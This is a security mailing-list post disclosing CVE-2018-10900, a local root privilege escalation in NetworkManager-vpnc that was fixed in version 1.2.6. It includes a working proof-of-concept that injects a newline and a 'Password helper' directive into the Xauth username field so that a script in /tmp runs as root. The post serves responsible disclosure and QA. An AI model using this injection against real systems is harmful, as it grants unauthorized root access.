Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [day] [month] [year] [list]
Date: Fri, 20 Jul 2018 11:38:39 +0200
From: Lubomir Rintel <>
Subject: CVE-2018-10900: NetworkManager-vpnc-1.2.4 local privilege escalation


NetworkManager-vpnc-1.2.6 fixes a local authenticated root bug.

The bug was responsibly disclosed to us by Denis Andzakovic. Please
credit him if you issue an advisory for a product that ships the
affected code. His original advisory should be available soon at

CVE Number: CVE-2018-10900

Original Report (will be available soon):


Release Notes:

Patched Version:

The exploit code for QA and documentation purposes follows:

cat <<EOF >/tmp/helper
id >/tmp/pwned
chmod +x /tmp/helper
nmcli c add con-name poc type vpn ifname '*' vpn-type vpnc \ "IKE DH Group = dh2" \ "IPSec ID = bar" \ "IPSec gateway =" \ "IPSec secret-flags = 4" \ "Local Port = 0" \ "NAT Traversal Mode = natt" \ "Perfect Forward Secrecy = server" \ "Vendor = cisco" \ "Xauth password-flags = 4" \ "Xauth username = foo$(echo; echo Password helper
/tmp/helper)" \ "ipsec-secret-type = save" \ "xauth-password-type = save"
nmcli c up poc

$ cat /tmp/pwned
uid=0(root) gid=0(root) groups=0(root)

Take care,

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ